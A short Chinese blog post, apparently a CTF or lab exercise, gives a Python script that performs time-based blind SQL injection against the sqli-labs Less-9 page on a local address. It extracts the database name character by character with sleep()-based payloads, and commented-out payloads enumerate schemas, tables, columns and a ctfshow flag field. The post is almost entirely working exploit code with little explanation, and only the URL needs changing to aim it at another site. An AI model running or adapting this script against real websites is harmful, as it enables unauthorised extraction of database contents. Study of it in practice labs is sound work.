mysql基于时间的盲注,使用python爆破库名
mysql基于时间的盲注
使用python代码进行爆破库名
import requests import time s = requests.session() # 创建session对象后,才可以调用对应的方法发送请求。 url = 'http://192.168.2.101/sqli-labs-master/Less-9/?id=' flag = '' i = 0 while True: i = i + 1 low = 32 high = 127 while low < high: mid = (low + high) // 2 # 查询数据库: payload = f'1\'%0cand%0cif((ascii(substr(database(),{i},1))>{mid}),1,sleep(5))--+' # 查询数据库:payload = f'1\'%0cand%0cif((ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid}),1,sleep(3))--+' # 查询数据表:payload = f'1\'%0cand%0cif(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'ctfshow\')),{i},1))>{mid},1,sleep(3))--+' # 查询表字段:payload = f'1\'%0cand%0cif(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="flagug")),{i},1))>{mid},1,sleep(3))--+' # 查询字段中信息:payload = f'1\'%0cand%0cif(ascii(substr((select(flag4a23)from(ctfshow.flagug)),{i},1))>{mid},1,sleep(3))--+' #payload = f'1\'%0cand%0cif(ascii(substr((select(flag4a23)from(ctfshow.flagug)),{i},1))>{mid},1,sleep(3))--+' stime = time.time() url1 = url + payload r = s.get(url=url1) r.encoding = "utf-8" # print(payload) if time.time() - stime < 3: low = mid + 1 else: high = mid if low != 32: flag += chr(low) else: break print(flag)
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?